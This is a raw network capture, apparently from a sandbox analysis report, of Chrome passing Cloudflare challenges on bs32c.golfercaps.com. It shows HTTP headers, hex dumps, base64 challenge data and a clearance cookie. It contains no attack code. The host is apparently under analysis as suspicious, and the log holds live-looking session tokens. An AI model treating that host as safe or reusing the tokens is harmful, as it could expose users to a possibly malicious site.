                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 4140
                                                                  Connection: close
                                                                  cf-chl-out-s: 2Mns/jgjnIoOEYhnoky6qOv+f6IAk+1MryKDgcqYRbG5ZCxAp+p5JY70eQKEKPQ9T0KAzV2JdhZ3TvCEVGlLpTynU1gX0agCmr5/7WI1l4p3/aDdXdluuDJHU/aAwfByvJ2N6PBv88dkViQ3lxrDjJY/norn9BwlHJErPA0B7bSytNx+QUtmQu/+NKmImskHi2eYQS81UYN8I+DrcbUYJ6h77kNzDHRCrLF90lf3h7SNIfrNAqfFwDebY3K44IZoFUnRHSyY1F0xmdKGiqs4Ts3q6z3BubeOAcb7sngcH+EA9wD5Vht8iZ8KlgANNO8ruMDhn0iGFS50/UVxtS1OsiQ3VDwlkPmwT8twY05S15pe3gGSzIw8DvaKZQCDabindXc9OOGLjBxEvuMxfiDxkbVfBEKqLcbW4eTEd3oUDNUfS7FnAfvUo9tcv68NbwdGToUDTG3bCtHusiPwsVNxSOWIG6LMFX63qf9q53U5KnAKRm0gzMCWSPjoWLM/iaOnDgbbVcg2hENSCLBJkQszs4WHVgNVIz+uf0vgZ6wxSfxYn3xl29RanRfQXFXpxEmtgkdAct3e5PkO6+H0rRF+2awLcDwQKpwDzqfvoFTRbnkDH5N5peoLZ+ejFJULMnCqoTsMyN8BnmFSI/nFB2yXcZfSv5iNAR1UaLIeJZSWyqZFNVfXwddOZkGaUWLmwSvV8QwVGguHehZp+KbPS5ykHnaQy/PYYhef06msIpkID+ZUEHDt/0y537lYkNk6JDAPrem1PVuXEgeZ4dkcJqWHLm/CKggS/+cdwGg/YR2+tvIyc41gJUGz1zGsc9Xgd8/+aKbhS4jtd9QEBLriXVHPoXsg5eaBw7z/88IpIMunki5VCnEE9JyVQ+2sQYE1d4b/wHI9NQ7Sp16RvRo90BlS2sRFJ20u4qTczkC3CGSfkTRatl4EDIMBpZW4Y7G0WPR+EecCJLBBNBYZ4Xc80NP2lz5GQx1MBRH4KAJaibwj0IE=$LlR7t [TRUNCATED]
                                                                  cf-chl-out: aBL0vMqT4LVG0laaMVaraSqOKU19+rECYEvRRed58fwltQ1lWWWEDytwZyC1T22ENnEBivRL70t/nYp1alrJHbtrbv17p2Yxl4J+DEV5A6bjsODLqpTSfZxX$nai0tjUC3l8hPJDU
                                                                  Server: cloudflare
                                                                  2024-12-30 21:42:31 UTC62INData Raw: 43 46 2d 52 41 59 3a 20 38 66 61 35 33 33 33 63 63 65 65 38 33 33 33 63 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                  Data Ascii: CF-RAY: 8fa5333ccee8333c-EWRalt-svc: h3=":443"; ma=86400
                                                                  2024-12-30 21:42:31 UTC1333INData Raw: 75 36 36 30 71 37 66 41 65 4b 71 4a 73 38 4f 39 73 38 57 37 77 73 4a 39 66 39 4c 56 6c 48 72 53 78 63 76 43 7a 74 65 50 77 62 36 55 77 71 4f 4f 79 5a 43 6c 69 2b 50 57 33 4e 50 66 36 4b 44 53 7a 36 62 54 74 4a 2f 62 6f 62 62 7a 35 75 7a 6a 37 2f 69 77 30 2f 48 74 32 50 4b 2f 71 63 65 72 38 67 50 38 38 67 58 36 41 67 4b 38 76 72 59 54 6f 72 6d 36 75 37 77 56 43 41 34 46 45 52 72 52 42 67 67 67 46 39 2f 4a 35 38 73 68 49 43 51 56 36 37 76 53 30 39 54 56 4c 69 45 6e 48 69 6f 7a 36 68 63 73 4e 67 38 76 39 65 4d 43 35 54 73 36 50 69 38 47 31 65 7a 74 37 75 39 49 4f 30 45 34 52 45 30 46 4f 69 67 77 49 68 41 4c 52 31 59 36 4e 42 51 4c 44 53 44 76 42 77 67 4a 43 6d 4a 56 57 31 4a 65 5a 78 39 55 51 6b 6f 38 4b 69 55 39 59 6d 56 55 4d 43 55 6e 4f 67 6f 4c 49 69 4d
                                                                  Data Ascii: u660q7fAeKqJs8O9s8W7wsJ9f9LVlHrSxcvCztePwb6UwqOOyZCli+PW3NPf6KDSz6bTtJ/bobbz5uzj7/iw0/Ht2PK/qcer8gP88gX6AgK8vrYTorm6u7wVCA4FERrRBgggF9/J58shICQV67vS09TVLiEnHioz6hcsNg8v9eMC5Ts6Pi8G1ezt7u9IO0E4RE0FOigwIhALR1Y6NBQLDSDvBwgJCmJVW1JeZx9UQko8KiU9YmVUMCUnOgoLIiM
                                                                  2024-12-30 21:42:31 UTC1369INData Raw: 6f 43 72 6d 49 71 41 70 6f 64 73 71 57 79 69 62 72 4b 71 73 6f 65 31 75 6f 79 77 71 49 71 52 71 4a 4b 75 71 33 79 6a 68 72 54 43 6e 62 4f 33 77 4d 44 44 67 38 72 50 73 4a 2b 31 72 49 32 4c 74 70 44 45 6d 70 75 73 32 5a 65 6f 77 64 7a 6a 6f 4f 50 5a 78 4e 54 44 73 37 4f 30 71 72 2f 44 72 63 66 71 30 74 50 7a 31 4f 37 6c 30 4f 6e 58 2b 38 36 34 2b 64 50 34 31 38 37 39 78 66 50 62 39 66 6e 45 33 73 62 4a 44 66 44 4e 36 68 50 37 33 4e 51 4e 39 41 33 56 32 73 2f 35 39 42 73 52 44 68 72 66 44 43 49 6d 45 2b 51 6d 2f 66 6a 35 35 78 34 62 43 69 41 62 43 43 6b 4c 4d 51 30 56 4a 53 51 56 50 53 63 51 4f 2f 63 59 49 54 44 37 42 42 48 39 42 2f 77 59 4a 77 55 57 4a 45 41 32 4a 77 31 55 4b 6a 49 70 53 56 5a 4b 45 31 73 39 4d 56 64 61 4f 52 6f 62 4d 6a 6b 31 4f 6b 4e 69
                                                                  Data Ascii: oCrmIqApodsqWyibrKqsoe1uoywqIqRqJKuq3yjhrTCnbO3wMDDg8rPsJ+1rI2LtpDEmpus2ZeowdzjoOPZxNTDs7O0qr/Drcfq0tPz1O7l0OnX+864+dP41879xfPb9fnE3sbJDfDN6hP73NQN9A3V2s/59BsRDhrfDCImE+Qm/fj55x4bCiAbCCkLMQ0VJSQVPScQO/cYITD7BBH9B/wYJwUWJEA2Jw1UKjIpSVZKE1s9MVdaORobMjk1OkNi
                                                                  2024-12-30 21:42:31 UTC1369INData Raw: 6c 6b 6b 4c 4f 4d 6f 47 32 32 6a 71 43 53 70 35 75 37 72 61 75 74 77 4c 4b 73 6a 49 32 65 74 4a 37 49 74 71 53 73 6f 36 71 62 70 73 61 71 73 63 53 75 70 4d 66 57 6a 36 36 72 79 36 7a 5a 31 74 71 55 76 64 71 65 74 35 6d 30 73 73 54 65 34 4f 54 69 70 4d 76 6b 76 75 50 72 77 75 2f 78 37 64 50 54 30 65 76 78 73 39 58 4e 39 50 72 4b 32 66 58 4e 38 4e 44 62 2b 75 4d 42 76 39 6e 49 78 64 66 6e 32 78 50 76 38 76 33 74 38 42 62 52 47 76 6f 4d 2b 75 6b 52 39 77 48 78 47 2f 59 59 35 66 6f 58 38 69 73 6d 49 2f 34 71 4c 53 6e 75 4a 51 67 73 36 53 45 35 48 78 49 55 45 76 4d 65 43 42 77 59 50 68 4d 31 46 67 38 54 4a 43 6c 49 48 51 41 2f 54 68 63 32 54 53 55 54 4a 55 6f 6c 53 6a 5a 53 55 30 45 7a 52 30 67 38 4f 53 6b 7a 51 57 49 79 55 47 51 69 52 46 5a 6a 4a 57 4a 72 61
                                                                  Data Ascii: lkkLOMoG22jqCSp5u7rautwLKsjI2etJ7ItqSso6qbpsaqscSupMfWj66ry6zZ1tqUvdqet5m0ssTe4OTipMvkvuPrwu/x7dPT0evxs9XN9PrK2fXN8NDb+uMBv9nIxdfn2xPv8v3t8BbRGvoM+ukR9wHxG/YY5foX8ismI/4qLSnuJQgs6SE5HxIUEvMeCBwYPhM1Fg8TJClIHQA/Thc2TSUTJUolSjZSU0EzR0g8OSkzQWIyUGQiRFZjJWJra
                                                                  2024-12-30 21:42:31 UTC69INData Raw: 70 5a 33 70 4b 76 6e 31 4e 54 71 36 73 5a 33 44 41 73 37 6d 77 76 4d 56 39 73 62 50 4c 77 6f 74 2b 64 74 4a 69 65 58 70 37 66 4e 54 48 7a 63 54 51 32 5a 47 30 30 73 36 35 30 36 43 53 6c 4b 64 33 36 77 3d 3d
                                                                  Data Ascii: pZ3pKvn1NTq6sZ3DAs7mwvMV9sbPLwot+dtJieXp7fNTHzcTQ2ZG00s6506CSlKd36w==


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  24192.168.2.458480188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:31 UTC1328OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/609964090:1735593069:6S3mpcqO1yILRgRXR0r0LjFCdbuSQ6cKt2unSWD0J4k/8fa532e0b89f421c/dHIAaNc3bgCsR5oKktnuJUphJqwfqu4osOi9Cn9zUWA-1735594936-1.2.1.1-hiLPnWAup5QiMMcYkqUgFSk0FeMKxRz.fwU8WEyUnAyFUxQygxfL_SCRekIkX5hP HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  Content-Length: 6294
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  Content-type: application/x-www-form-urlencoded
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  CF-Chl-RetryAttempt: 0
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  CF-Challenge: dHIAaNc3bgCsR5oKktnuJUphJqwfqu4osOi9Cn9zUWA-1735594936-1.2.1.1-hiLPnWAup5QiMMcYkqUgFSk0FeMKxRz.fwU8WEyUnAyFUxQygxfL_SCRekIkX5hP
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Origin: https://bs32c.golfercaps.com
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:31 UTC6294OUTData Raw: 76 5f 38 66 61 35 33 32 65 30 62 38 39 66 34 32 31 63 3d 7a 63 6c 73 38 35 78 6a 68 4c 63 78 68 42 6a 78 79 74 34 74 30 42 49 74 77 74 65 74 6c 55 78 49 45 78 38 74 64 41 4c 49 78 48 74 25 32 62 55 43 4d 58 74 62 45 73 31 53 4f 6a 68 42 63 44 41 74 31 49 74 44 56 55 78 4a 78 78 49 73 73 74 6e 73 42 6f 74 4e 30 4a 74 74 4a 74 35 45 74 53 74 6c 45 74 4d 74 44 58 45 39 74 79 79 45 74 66 46 2d 39 38 50 74 71 38 7a 62 53 61 74 7a 73 72 46 6d 74 62 48 62 37 74 43 6f 58 79 37 74 65 50 68 74 61 78 43 65 51 74 61 61 37 74 49 67 4f 79 6e 34 51 74 61 32 37 74 35 55 74 67 39 55 74 66 73 78 4b 6f 2d 4d 45 75 74 35 4b 74 49 4d 68 51 41 35 6a 4d 74 38 37 48 73 78 32 51 38 78 45 74 42 4d 70 74 49 4a 41 45 74 65 6f 62 41 72 63 6b 49 62 50 6b 39 61 4b 37 35 69 51 46 30 79
                                                                  Data Ascii: v_8fa532e0b89f421c=zcls85xjhLcxhBjxyt4t0BItwtetlUxIEx8tdALIxHt%2bUCMXtbEs1SOjhBcDAt1ItDVUxJxxIsstnsBotN0JttJt5EtStlEtMtDXE9tyyEtfF-98Ptq8zbSatzsrFmtbHb7tCoXy7tePhtaxCeQtaa7tIgOyn4Qta27t5Utg9UtfsxKo-MEut5KtIMhQA5jMt87Hsx2Q8xEtBMptIJAEteobArckIbPk9aK75iQF0y
                                                                  2024-12-30 21:42:32 UTC1350INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:31 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 4020
                                                                  Connection: close
                                                                  cf-chl-out-s: q6JTwBFmIkkQ7ERd+/qTQE5Q73fMH2xkqPq/0XzaZOanVjA07MQSS1LTZpammvLAgo4LP/wEhsyYUP3yGlrQ/tzwP8n2Q6QMUx5RhMwHIh0CIHErYd5KBoe7JhTZSeKUWYveIH4pxoAXRat67MpVt3y7ZQPBrhA0RPF8ohUcxd2rjPynvqyMjVOfRKU7sfxlvF+H9d6LOIHvMnWfNpeDd1LM/MeFcdir8PQRDFsdPhpMiEOOtBi9PpcCkq4pa5GShT97pCVrIS1e7AhFoHgf8RHGFuVDVYJC1uLEfiffqxKaiXUYVJDiictwvF6T/yNQjzPh2ph4Hijns5PlfIEp7X8CYqDKQEd1vuy5TatWT9UJYB3EhTe76oGTsJ4aExDju34eXp46GOHynuY48Mr24btyCgVZ3YM2CinuM8U3dQn4siyxsLWUU1eMn6DOFeKkcsIe9IFTGbVOqmcTuxTXuHL5x/Ruv5/o6nrVYVS5L5x/YhPjYnz8TKzGs8ME77wY7iVlosu3ZoFYHlYuq88Y9Cg3jU0YFv0LSrXtxRuXmIMiBvKR+CoHPuXyt+seTQdxJSihWkGpr94b0gTlBQGrvCnPhSbpdWQYU4IOomFbdCARD4VDtJ7YN6rySuv+z8qL$To/zxPYeL+UyGwF3
                                                                  set-cookie: cf_chl_rc_m=;Expires=Sun, 29 Dec 2024 21:42:31 GMT;SameSite=Strict
                                                                  cf-chl-out: ty5cRTjmWMKZHfcImpjxsL/dd0E+y4hb+kNrL0vzmsT0hH7yWOU5gLGZajrOAsv9woxvByQxew+yDCXiyPT8UP8RG+32$zHkvvBrMNqvnXBUC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h4EKVw3PC9UY%2BVb96EOqCb0KCvBG1BhJJuNX9l%2FTUjaGqy4IFeDNtXWm0W0xqmr1ilU8xzTkmFgneoDx8kH9%2Bma54J39w699PYRP2Ags5MvIRYPDVGLjuoIVjevNGB%2BcbPc%2B0zbFvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  2024-12-30 21:42:32 UTC298INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 61 35 33 33 34 31 38 64 62 33 34 33 39 34 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 32 36 32 32 26 6d 69 6e 5f 72 74 74 3d 32 33 35 37 26 72 74 74 5f 76 61 72 3d 31 30 37 33 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 31 32 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 33 34 26 72 65 63 76 5f 62 79 74 65 73 3d 38 32 34 34 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 32 33 38 38 36 32 26 63 77 6e 64 3d 31 36 38 26 75 6e 73 65 6e 74 5f 62
                                                                  Data Ascii: Server: cloudflareCF-RAY: 8fa533418db34394-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2622&min_rtt=2357&rtt_var=1073&sent=6&recv=12&lost=0&retrans=0&sent_bytes=2834&recv_bytes=8244&delivery_rate=1238862&cwnd=168&unsent_b
                                                                  2024-12-30 21:42:32 UTC1090INData Raw: 74 36 71 77 70 37 4f 38 64 4b 61 46 72 37 2b 35 72 38 47 33 76 72 35 35 65 38 37 52 6b 48 62 4f 77 63 65 2b 79 74 4f 4c 76 62 71 51 76 70 2b 4b 78 59 79 68 68 39 2f 53 32 4d 2f 62 35 4a 7a 4f 79 36 4c 50 73 4a 76 58 6e 62 4c 65 37 75 6a 65 38 4f 62 74 37 61 44 6f 35 2f 66 57 36 76 72 35 41 73 7a 35 2b 76 66 32 38 39 33 78 2f 76 65 37 76 62 55 53 6f 62 69 35 75 72 73 51 46 51 67 55 42 41 72 43 79 78 77 50 46 51 77 59 49 51 62 53 44 42 45 56 44 78 51 61 48 78 4d 6b 4a 69 76 65 46 68 58 68 48 78 45 33 4c 79 58 6e 48 2b 76 6a 51 4d 2f 6d 35 2b 6a 70 36 75 76 73 37 54 49 78 52 44 66 79 2b 6a 35 45 53 7a 31 4c 4f 7a 35 51 52 6c 52 45 42 78 76 72 41 77 51 46 42 67 63 49 43 51 6f 4c 44 41 30 4f 59 56 56 6c 5a 32 56 69 46 52 31 61 58 6c 68 64 59 32 68 63 63 47 4a
                                                                  Data Ascii: t6qwp7O8dKaFr7+5r8G3vr55e87RkHbOwce+ytOLvbqQvp+KxYyhh9/S2M/b5JzOy6LPsJvXnbLe7uje8Obt7aDo5/fW6vr5Asz5+vf2893x/ve7vbUSobi5ursQFQgUBArCyxwPFQwYIQbSDBEVDxQaHxMkJiveFhXhHxE3LyXnH+vjQM/m5+jp6uvs7TIxRDfy+j5ESz1LOz5QRlREBxvrAwQFBgcICQoLDA0OYVVlZ2ViFR1aXlhdY2hccGJ
                                                                  2024-12-30 21:42:32 UTC1369INData Raw: 76 65 35 4e 76 6e 38 4b 6a 4c 36 65 58 51 36 72 65 68 76 36 50 71 2b 76 54 71 2f 50 4c 35 2b 62 53 32 72 67 75 61 73 62 4b 7a 74 41 7a 33 43 72 67 41 43 67 34 4b 34 67 75 2f 33 63 45 48 45 77 67 62 46 41 30 58 48 74 67 50 48 78 4d 51 4a 42 62 32 48 78 6b 69 47 79 55 73 34 4f 41 68 4b 79 38 72 35 65 6a 37 79 2b 4c 6a 35 4f 55 74 4e 7a 73 33 45 44 6a 36 51 54 52 45 45 6b 5a 48 52 6a 34 34 54 45 77 2b 41 67 49 39 51 46 4a 49 54 30 38 4a 44 77 52 63 54 31 56 4d 57 47 45 5a 53 31 42 55 54 6c 4e 5a 58 6c 4a 6a 5a 57 6f 6c 58 6c 6f 6a 4e 67 59 64 48 68 38 67 5a 33 46 31 63 55 70 79 4e 58 74 75 66 6b 79 41 67 59 42 34 63 6f 61 47 65 44 77 38 67 33 79 4d 67 59 6c 2f 51 30 6b 2b 52 6e 42 77 64 58 64 4c 54 6d 45 78 53 45 6c 4b 53 35 4b 63 6f 4a 78 31 6e 57 43 6d 6d
                                                                  Data Ascii: ve5Nvn8KjL6eXQ6rehv6Pq+vTq/PL5+bS2rguasbKztAz3CrgACg4K4gu/3cEHEwgbFA0XHtgPHxMQJBb2HxkiGyUs4OAhKy8r5ej7y+Lj5OUtNzs3EDj6QTREEkZHRj44TEw+AgI9QFJIT08JDwRcT1VMWGEZS1BUTlNZXlJjZWolXlojNgYdHh8gZ3F1cUpyNXtufkyAgYB4coaGeDw8g3yMgYl/Q0k+RnBwdXdLTmExSElKS5KcoJx1nWCmm
                                                                  2024-12-30 21:42:32 UTC1369INData Raw: 72 38 66 47 6c 71 4c 75 4c 6f 71 4f 6b 70 66 6e 32 39 41 44 76 7a 2b 30 43 37 2b 4d 41 2f 50 63 43 32 51 4c 45 43 2f 30 4f 32 78 41 52 45 41 67 43 46 68 59 49 79 38 73 61 49 42 67 4f 30 4e 62 4c 30 78 59 59 46 42 55 58 49 64 72 64 38 4d 44 58 32 4e 6e 61 4c 79 77 71 4e 53 55 46 49 7a 63 6c 47 54 55 79 4c 54 63 50 4e 2f 6c 41 4d 30 4d 52 52 55 5a 46 50 54 64 4c 53 7a 30 42 41 55 6b 39 53 6b 4d 47 44 41 45 4a 47 6b 6f 64 53 30 74 4c 47 56 41 63 48 42 39 55 55 6c 45 6a 4a 79 63 71 4a 69 64 61 4d 43 38 77 58 32 49 7a 4e 6a 4d 31 4f 44 4d 37 61 47 74 73 61 47 34 2b 62 32 78 45 63 45 4a 48 63 55 68 44 64 55 6c 48 66 45 39 4f 66 6c 46 39 54 30 39 50 67 49 47 45 67 30 70 4e 59 44 42 48 53 45 6c 4b 6e 70 75 5a 70 4a 52 30 6b 71 61 55 69 4b 53 68 6e 4b 5a 2b 70 6d
                                                                  Data Ascii: r8fGlqLuLoqOkpfn29ADvz+0C7+MA/PcC2QLEC/0O2xAREAgCFhYIy8saIBgO0NbL0xYYFBUXIdrd8MDX2NnaLywqNSUFIzclGTUyLTcPN/lAM0MRRUZFPTdLSz0BAUk9SkMGDAEJGkodS0tLGVAcHB9UUlEjJycqJidaMC8wX2IzNjM1ODM7aGtsaG4+b2xEcEJHcUhDdUlHfE9OflF9T09PgIGEg0pNYDBHSElKnpuZpJR0kqaUiKShnKZ+pm
                                                                  2024-12-30 21:42:32 UTC192INData Raw: 6f 71 50 37 37 76 54 72 39 77 47 34 36 75 2f 7a 37 66 4c 34 2f 66 45 44 42 51 72 45 43 41 4c 63 44 78 48 4d 79 77 41 51 45 51 63 52 43 4f 63 4f 45 42 51 4e 30 52 45 62 48 78 76 7a 48 4e 6e 73 76 4e 50 55 31 64 59 65 4b 43 77 6f 41 53 6e 72 4d 6a 55 6a 4c 79 77 34 37 4f 34 43 30 65 6a 70 36 75 74 45 4e 7a 30 30 51 45 6b 42 4e 54 64 50 52 67 2f 34 46 2f 70 51 54 31 4e 45 47 2b 70 66 48 75 33 75 54 30 30 49 45 57 46 55 57 6c 46 64 5a 68 35 53 56 47 78 6a 4c 42 38 58 63 77 4d 61 47 78 77 64 64 57 68 75 5a 58 46 36 4d 6c 56 7a 62 31 70 30 51 54 4d 31 53 42 69 4d 47 67 3d 3d
                                                                  Data Ascii: oqP77vTr9wG46u/z7fL4/fEDBQrECALcDxHMywAQEQcRCOcOEBQN0REbHxvzHNnsvNPU1dYeKCwoASnrMjUjLyw47O4C0ejp6utENz00QEkBNTdPRg/4F/pQT1NEG+pfHu3uT00IEWFUWlFdZh5SVGxjLB8XcwMaGxwddWhuZXF6MlVzb1p0QTM1SBiMGg==


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  25192.168.2.458481104.18.95.41443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:31 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/404157209:1735593090:PkZ6LfythNHPr79mCMt43ygV4Jt_HfPkfi_yir-aMeY/8fa532ef18b9435c/c5n.2QPsOfIcLwMXbdQYrbHlLiukXQ1i_.C1_tbXgow-1735594938-1.1.1.1-YpojflswdDcU2Qa5EQBSQn7CvS2Y13qHu8rjKzZWOLrUr9SVmp.uSlaks2qKCMkH HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:32 UTC379INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 30 Dec 2024 21:42:32 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 7
                                                                  Connection: close
                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                  cf-chl-out: Ru90kBt+IYS4TxosudS/4Gd0Lvh2zwHHHzE=$dCCESmwfjPFxrXcF
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa533420a5142e0-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2024-12-30 21:42:32 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                  Data Ascii: invalid


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  26192.168.2.458483188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:32 UTC1255OUTPOST /vfd23ced/ HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  Content-Length: 6040
                                                                  Cache-Control: max-age=0
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-platform: "Windows"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  Upgrade-Insecure-Requests: 1
                                                                  Origin: https://bs32c.golfercaps.com
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-User: ?1
                                                                  Sec-Fetch-Dest: document
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/?__cf_chl_tk=.t4_fTJ6..fLu83eCFtwRHaH9sSWM82a2A3hSooL1N8-1735594936-1.0.1.1-2NnitAHUkIRWasCED.LdyHmLvy_cTl17DXqwUbIw_u0
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:32 UTC6040OUTData Raw: 39 62 37 34 61 36 32 35 30 64 65 36 36 33 63 63 37 30 62 30 39 62 38 36 36 62 61 61 35 30 36 65 31 61 33 66 30 35 34 37 63 37 37 36 33 36 62 38 33 39 63 66 39 64 32 61 32 37 61 30 63 33 39 35 3d 42 76 48 5f 63 35 50 6e 71 4c 64 6c 70 46 49 4d 6f 57 7a 63 73 49 4d 33 47 4e 6a 66 44 6a 37 31 6a 56 64 65 48 67 4a 42 61 6e 30 2d 31 37 33 35 35 39 34 39 33 36 2d 31 2e 32 2e 31 2e 31 2d 31 6c 4d 4f 58 6c 38 52 52 74 71 32 35 6c 58 4b 61 45 4e 76 49 36 66 38 4a 62 75 32 6d 51 6a 54 68 6d 68 56 33 46 52 55 49 4a 39 48 61 54 6c 68 58 4d 70 79 72 6f 39 71 32 63 79 4a 58 7a 59 72 4b 74 4d 64 79 38 37 39 51 72 47 68 65 41 79 37 71 53 73 58 39 7a 4f 6a 34 55 58 48 63 7a 78 36 4d 63 66 43 44 5f 78 4f 69 77 70 46 44 38 69 66 6b 78 6e 5a 71 4a 71 61 6b 39 50 70 63 56 63
                                                                  Data Ascii: 9b74a6250de663cc70b09b866baa506e1a3f0547c77636b839cf9d2a27a0c395=BvH_c5PnqLdlpFIMoWzcsIM3GNjfDj71jVdeHgJBan0-1735594936-1.2.1.1-1lMOXl8RRtq25lXKaENvI6f8Jbu2mQjThmhV3FRUIJ9HaTlhXMpyro9q2cyJXzYrKtMdy879QrGheAy7qSsX9zOj4UXHczx6McfCD_xOiwpFD8ifkxnZqJqak9PpcVc
                                                                  2024-12-30 21:42:33 UTC1349INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:32 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: cf_clearance=; Path=/; Expires=Thu, 01-Jan-70 00:00:00 GMT; Domain=.golfercaps.com; Priority=High; HttpOnly; Secure; SameSite=None
                                                                  Set-Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU; Path=/; Expires=Tue, 30-Dec-25 21:42:32 GMT; Domain=.golfercaps.com; Priority=High; HttpOnly; Secure; SameSite=None; Partitioned
                                                                  cf-cache-status: DYNAMIC
